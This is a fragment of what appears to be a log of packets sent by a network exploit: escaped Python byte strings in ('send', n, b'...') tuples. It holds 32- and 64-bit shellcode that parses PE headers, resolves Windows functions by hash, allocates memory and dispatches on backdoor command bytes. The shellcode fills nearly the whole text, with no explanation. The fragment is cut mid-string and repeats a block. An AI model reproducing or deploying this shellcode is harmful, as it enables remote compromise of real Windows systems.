Ph.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', \"('send', 3, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 4, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\